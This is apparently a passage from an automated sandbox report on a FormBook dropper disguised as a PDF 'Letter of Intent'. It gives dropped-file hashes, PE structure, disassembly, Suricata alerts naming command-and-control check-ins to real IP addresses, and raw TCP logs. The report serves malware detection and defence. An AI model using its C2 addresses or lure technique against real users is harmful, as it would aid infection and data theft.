                                                                                    Malicious:false
                                                                                    Preview:......y...............................................................................................................................................................................................J.....................F..u........&.]..............................................................|...............................................................r...K.....[......................................V.............................Y.._.....................K.......Y............................................................+...&T................................R............................X...........U.........................................'................................................O.....E..........<..............................B..................................P..........................................K....K....................................i............................................................................*..B&.........."......#J......................r....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\interdatainteressers.car

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):355077
                                                                                    Entropy (8bit):1.2559441428269094
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:O8NKTwsabfHGEiOnKsSugRvnwIc8m/Cwu1264ZhD/UnZvIUtJPE7dmSKrTCLONXv:Ts7OnxBC5hCcz+g/hDnLebmpzE
                                                                                    MD5:77BB7E13B5BFEAF3F93ACBEC6452CAB6
                                                                                    SHA1:2F64CF4189221B8C597A430AF32AE22BEACFEE55
                                                                                    SHA-256:B10E831B356D18C7666F99A0CA35FF881DE2FB0AD1018D96E4B11EAA5A8DE074
                                                                                    SHA-512:5D79E8E51CC88D45634E7F3289DF00B62008561E7B1271B9FC5EBA76663A9DF9E93176B959D8C4BBE7B65272500F705B8097A93EC48B44BD6EFBE26F1A23196C
                                                                                    Malicious:false
                                                                                    Preview:.....................................................................................=......1.....7.............].........................J...*.......y...........y...............&...........................#U........................................F.......................................5.....................]..............................l...(..................................................................A........................................l.................U.&.....................................................................9...............k......................'..S...............$.................J.................................+.......................w........5.....>............)...............................................i.....@....Q..[............................t5.....................................................I.........................G........m.........+..........S.........................#........&..................................*.......]..............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\assister.lat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):228011
                                                                                    Entropy (8bit):1.2532037500229543
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:y84Q/u64rOry42JVzYWe2cBVS8Z9CdGhovLplTvheStLNVe0AQDyNfZZ4y1l1sRS:poKw/k9CR3w48aQdggr
                                                                                    MD5:C9E637823D691E03E1EF73F8E64ADD08
                                                                                    SHA1:023BC1C491EC1B246F7E8FEBE5A61A2070527748
                                                                                    SHA-256:AF958CDA45A90F95517D266FF0D3BC47A776D7F8E9B8F47F135C156B22269D6D
                                                                                    SHA-512:BA0B0DD92F0C92F1EBDA941B0CFEA1EFD23330CF22722528F105E389B0A6A4BC1E67B896016E04A06103DE1043DE951D0D5614246049E52F4E383DF9FE460FB3
                                                                                    Malicious:false
                                                                                    Preview:....................................I.......................................................................................................6.....m.h....2..............................................................................2.................."...................D............-.......o...................................D............................................\...................................................................................b.......Y.......8..............................................V.........4....................................................&....d........}......................................................$...............$..8......................M.......>.............h.................................................................r......'..........p.6........................]..!C................................................................-..........v......................S................*.......d........................J............;.....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\autografsamlernes.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):524
                                                                                    Entropy (8bit):4.273168465400228
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:0Lxm1D0cB6JcmOkOaDJ1yAMFAzvpRvyOpQyZWiRna:silm2YTy9uWy4iRa
                                                                                    MD5:ED75DDC6B937EC6859D3514B65746038
                                                                                    SHA1:87D81D925A7D60C966957B422CA3437DF5336D23
                                                                                    SHA-256:66B24667C0EAB0C7341C088A7403D538E7A5FD81497C2CC879E1A3B6CA422CAD
                                                                                    SHA-512:8CA8F12DDF374E0328788C32773E55ADD74097DD23758A196C6B77778042F098F06FC41C196C9D3F0782359FBF768D4BB87B96486848ECBD28E3CA4620C2D810
                                                                                    Malicious:false
                                                                                    Preview:charmers ttnings paxiuba ansporing fiksstjernen trica prominences.grafikrutinernes zygmund klaphamres amene laicizations sangbunde akrabattine metachromasis kiteflier choleate modtageliges promenere..autoriseringerne physiotherapeutical vrdistemplingens.enmity opkradsning shooler semiclosure scrivenery acephalite.chrysopa cathartidae bropengene slaaskamps skvatfigurerne..unretired obambulate tilsvinede ulselighedens medynken grdeskringer reportagens hazardously overpresumptive ecphonema slaabrokkernes temperamenterne..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\biltoges.cat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):325029
                                                                                    Entropy (8bit):1.2487650379056912
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:L5X2ja28J6QCVkiTiKt76+pzV5KmA0FfXrUzCSc3sYn8MkT5AzTSiROIHidBmry4:L5Xj6b7jL8/ndONNQSK7H
                                                                                    MD5:364853569F11BF9AB8030CD2DAA4B6A5
                                                                                    SHA1:CF9FF525E6C1EFA00AFC0BA54A9819E69BD081A8
                                                                                    SHA-256:C2926350CF2C936CB4A932FD7BEE4524B5EE517CCF9634ED6F4E729374612FA6
                                                                                    SHA-512:D3B5911D1A96D0F6365C29F299ADEFFCEE6ED3A9FA28833EC94976D1A625F108CF68B02F7FF87CCE9D19DB71A06CE951B51D1BA67118D062226F4A5A7C1115FE
                                                                                    Malicious:false
                                                                                    Preview:................Fc....!...s...............................q...................................j..............I.............................................................>.....W......;..............................................................}...........................e...................................._.................................................}..........................................................u..........................`....................................Y.......C.....................................u..........3..............a........../..........M........V..................................................g....................../|...............................^.......Q...................*..............f.....................T.......................~..........]..............'....................................0.......................................................R......0...............:.........................................................................

                                                                                    C:\Users\user\Chiliahedron.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1054
                                                                                    Entropy (8bit):3.2566849542921017
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8wl0hsXowAOcQ/tz+7REAZcU9+Q1QlKHRKMJsW+slqeWQaUOogv+g/3NJkKAd4tK:8yLDaREGfaEry9eIUOoP49HAvqy
                                                                                    MD5:0FA2FAF25B495C76B5DEAECDB94C87A5
                                                                                    SHA1:040967BB53C3361A1D7269C071ECC92D391F4B59
                                                                                    SHA-256:12B471BE019DE569A910D6F2BC61EFBA5840EA16D27F1945F990D8C4EEAD8B4B
                                                                                    SHA-512:579A929893EE89CDF856A279CDEABD6C6B08788B5E299A626EE8DEFB6E62538D58FB8B1C5EF54EDDE9E17B9B75D0C5F5C51162D8396B27458FCB413857C59EB6
                                                                                    Malicious:false
                                                                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....f.2...........udvejens.Sta..J............................................u.d.v.e.j.e.n.s...S.t.a...........\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.u.d.v.e.j.e.n.s...S.t.a.x.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.s.i.p.h.o.n.o.p.h.o.r.a.n.\.A.r.v.e.a.f.g.i.f.t.e.r.n.e.s.\.w.r.i.g.h.t.\.U.n.s.e.c.l.u.d.e.d.l.y.\.U.n.p.u.l.v.e.r.i.s.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.607108347285623
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File size:872'244 bytes
                                                                                    MD5:629be165860d2336755de85467756639
                                                                                    SHA1:af1da57d01a00bf942e127cce60fb4208bfd9795
                                                                                    SHA256:e9617a78c93e6d5cdc1087dfa6e9bf9d63406e05b6b01135c189242a7c33718c
                                                                                    SHA512:418f56a804212158033b1ae592cafeb8fa1c5a0d9506eb541beb7762c23ebfe5c61dbac8588c350816c229e9f6d77457e361423146874695976c1b8d9267cbff
                                                                                    SSDEEP:24576:ZNAsPMh+Cdd8509puHmATonQ1htKzWbGWO:dPMvA509pkonAhtHbnO
                                                                                    TLSH:1105120A7B16E947C9704D3CA8B5CA542BB47C0C9961E33277C07F6E3DB3642AA83795
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@

                                                                                    File Icon

                                                                                    Icon Hash:87933b33334c7017

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4031dd
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:7fd61eafe142870d6d0380163804a642

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    xor ebp, ebp
                                                                                    pop esi
                                                                                    mov dword ptr [esp+18h], ebp
                                                                                    mov dword ptr [esp+10h], 0040A2D8h
                                                                                    mov dword ptr [esp+14h], ebp
                                                                                    call dword ptr [00408034h]
                                                                                    push 00008001h
                                                                                    call dword ptr [00408134h]
                                                                                    push ebp
                                                                                    call dword ptr [004082ACh]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00434F58h], eax
                                                                                    call 00007F257D7EFA65h
                                                                                    mov dword ptr [00434EA4h], eax
                                                                                    push ebp
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebp
                                                                                    push 0042B1B8h
                                                                                    call dword ptr [0040817Ch]
                                                                                    push 0040A2C0h
                                                                                    push 00433EA0h
                                                                                    call 00007F257D7EF6D0h
                                                                                    call dword ptr [00408138h]
                                                                                    mov ebx, 0043F000h
                                                                                    push eax
                                                                                    push ebx
                                                                                    call 00007F257D7EF6BEh
                                                                                    push ebp
                                                                                    call dword ptr [0040810Ch]
                                                                                    cmp word ptr [0043F000h], 0022h
                                                                                    mov dword ptr [00434EA0h], eax
                                                                                    mov eax, ebx
                                                                                    jne 00007F257D7ECBDAh
                                                                                    push 00000022h
                                                                                    mov eax, 0043F002h
                                                                                    pop esi
                                                                                    push esi
                                                                                    push eax
                                                                                    call 00007F257D7EF12Ch
                                                                                    push eax
                                                                                    call dword ptr [00408240h]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F257D7ECC99h
                                                                                    push 00000020h
                                                                                    pop edx
                                                                                    cmp cx, dx
                                                                                    jne 00007F257D7ECBD9h
                                                                                    inc eax
                                                                                    inc eax
                                                                                    cmp word ptr [eax], dx
                                                                                    je 00007F257D7ECBCBh
                                                                                    add word ptr [eax], 0000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x28300.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x60100x6200c51ae685760de510818d22f29d66b8b0False0.6646603954081632data6.440168137798694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x14600x160024345ed7377f4b4663284282b5ef48b3False0.42134232954545453data4.947177345443015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x2af980x600dc268be7d1af6fdfcd38d44492cfdaf5False0.486328125data3.791234740340295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x5d0000x283000x28400a119b7e5d4138a60065aad86fa7fabffFalse0.3532062791149068data4.59595260611914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x5d3580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3054241097835088
                                                                                    RT_ICON0x6db800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3743167963001892
                                                                                    RT_ICON0x770280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.38766173752310534
                                                                                    RT_ICON0x7c4b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3723429381199811
                                                                                    RT_ICON0x806d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42686721991701243
                                                                                    RT_ICON0x82c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.43550656660412757
                                                                                    RT_ICON0x83d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5016393442622951
                                                                                    RT_ICON0x846b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                    RT_DIALOG0x84b180x120dataEnglishUnited States0.5104166666666666
                                                                                    RT_DIALOG0x84c380x11cdataEnglishUnited States0.6056338028169014
                                                                                    RT_DIALOG0x84d580xc4dataEnglishUnited States0.5918367346938775
                                                                                    RT_DIALOG0x84e200x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x84e800x76dataEnglishUnited States0.7457627118644068
                                                                                    RT_VERSION0x84ef80x138dataEnglishUnited States0.5865384615384616
                                                                                    RT_MANIFEST0x850300x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                    ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                    ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-06T20:32:32.980672+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449730TCP
                                                                                    2024-11-06T20:32:37.413179+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973569.27.100.185443TCP
                                                                                    2024-11-06T20:33:13.156494+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449792TCP
                                                                                    2024-11-06T20:33:21.629609+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4498443.33.130.19080TCP
                                                                                    2024-11-06T20:33:21.629609+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498443.33.130.19080TCP
                                                                                    2024-11-06T20:33:37.730040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449922180.178.39.23580TCP
                                                                                    2024-11-06T20:33:40.308120+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449938180.178.39.23580TCP
                                                                                    2024-11-06T20:33:43.026832+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449950180.178.39.23580TCP
                                                                                    2024-11-06T20:33:45.370544+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449965180.178.39.23580TCP
                                                                                    2024-11-06T20:33:45.370544+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449965180.178.39.23580TCP
                                                                                    2024-11-06T20:33:51.292199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450001203.161.49.19380TCP
                                                                                    2024-11-06T20:33:53.834312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450009203.161.49.19380TCP
                                                                                    2024-11-06T20:33:56.388553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450010203.161.49.19380TCP
                                                                                    2024-11-06T20:33:58.924339+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450011203.161.49.19380TCP
                                                                                    2024-11-06T20:33:58.924339+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450011203.161.49.19380TCP
                                                                                    2024-11-06T20:34:04.854646+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450012217.160.0.13280TCP
                                                                                    2024-11-06T20:34:07.463930+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450013217.160.0.13280TCP
                                                                                    2024-11-06T20:34:10.057706+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450014217.160.0.13280TCP
                                                                                    2024-11-06T20:34:12.569554+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450015217.160.0.13280TCP
                                                                                    2024-11-06T20:34:12.569554+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450015217.160.0.13280TCP
                                                                                    2024-11-06T20:34:19.192230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016216.40.34.4180TCP
                                                                                    2024-11-06T20:34:21.979086+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017216.40.34.4180TCP
                                                                                    2024-11-06T20:34:24.595400+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018216.40.34.4180TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 6, 2024 20:32:36.127119064 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:36.127146959 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:36.127223015 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:36.139588118 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:36.139601946 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.088186979 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.088274002 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.170129061 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.170151949 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.170496941 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.170562983 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.174398899 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.219332933 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.413222075 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.413249016 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.413264036 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.413314104 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.413353920 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.413363934 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.413414955 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.474168062 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.474195004 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.474344969 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.474363089 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.474415064 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.530158043 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.530178070 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.530268908 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.530284882 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.530324936 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.590673923 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.590683937 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.590760946 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.590794086 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.590854883 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.592468977 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.592489004 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.592564106 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.592572927 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.592616081 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.594053984 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.594069958 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.594135046 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.594142914 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.594183922 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.647650957 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.647669077 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.647723913 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.647758961 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.647770882 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.647799015 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.709099054 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709119081 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709156036 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.709176064 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709203005 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.709227085 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.709425926 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709450960 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709492922 CET49735443192.168.2.469.27.100.185
                                                                                    Nov 6, 2024 20:32:37.709500074 CET4434973569.27.100.185192.168.2.4
                                                                                    Nov 6, 2024 20:32:37.709522009 CET49735443192.168.2.469.27.100.185
